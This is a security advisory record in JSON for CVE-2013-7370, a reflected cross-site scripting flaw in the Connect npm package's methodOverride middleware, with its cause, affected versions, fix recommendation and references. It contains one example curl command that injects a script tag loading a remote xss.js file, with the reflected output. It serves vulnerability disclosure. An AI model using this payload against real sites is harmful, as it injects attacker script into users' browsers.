{"id":"GHSA-3fw8-66wf-pr7m","summary":"methodOverride Middleware Reflected Cross-Site Scripting in connect","details":"Connect is a stack of middleware that is executed in order in each request.\n\nThe \"methodOverride\" middleware allows the http post to override the method of the request with the value of the \"_method\" post key or with the header \"x-http-method-override\".\n\nBecause the user post input was not checked, req.method could contain any kind of value. Because the req.method did not match any common method VERB, connect answered with a 404 page containing the \"Cannot `[method]` `[url]`\" content. The method was not properly encoded for output in the browser.\n\n\n###Example:\n```\n~ curl \"localhost:3000\" -d \"_method=\u003cscript src=http://nodesecurity.io/xss.js\u003e\u003c/script\u003e\"\nCannot \u003cSCRIPT SRC=HTTP://NODESECURITY.IO/XSS.JS\u003e\u003c/SCRIPT\u003e /\n```\n\n## Recommendation\n\nUpdate to the newest version of Connect or disable methodOverride. It is not possible to avoid the vulnerability if you have enabled this middleware in the top of your stack.","aliases":["CVE-2013-7370"],"modified":"2023-11-01T04:45:22.081Z","published":"2020-08-31T22:41:27Z","database_specific":{"nvd_published_at":null,"cwe_ids":["CWE-79"],"severity":"LOW","github_reviewed":true,"github_reviewed_at":"2020-08-31T18:07:25Z"},"references":[{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2013-7370"},{"type":"WEB","url":"https://github.com/senchalabs/connect/issues/831"},{"type":"WEB","url":"https://github.com/senchalabs/connect/commit/126187c4e12162e231b87350740045e5bb06e93a"},{"type":"WEB","url":"https://github.com/senchalabs/connect/commit/277e5aad6a95d00f55571a9a0e11f2fa190d8135"},{"type":"WEB","url":"https://access.redhat.com/security/cve/cve-2013-7370"},{"type":"WEB","url":"https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-7370"},{"type":"WEB","url":"https://bugzilla.suse.com/show_bug.cgi?id=CVE-2013-7370"},{"type":"WEB","url":"https://security-tracker.debian.org/tracker/CVE-2013-7370"},{"type":"WEB","url":"https://www.npmjs.com/advisories/3"},{"type":"WEB","url":"http://www.openwall.com/lists/oss-security/2014/04/21/2"},{"type":"WEB","url":"http://www.openwall.com/lists/oss-security/2014/05/13/1"}],"affected":[{"package":{"name":"connect","ecosystem":"npm","purl":"pkg:npm/connect"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"2.8.1"}]}],"database_specific":{"last_known_affected_version_range":"\u003c= 2.8.0","source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/08/GHSA-3fw8-66wf-pr7m/GHSA-3fw8-66wf-pr7m.json"}}],"schema_version":"1.9.0"}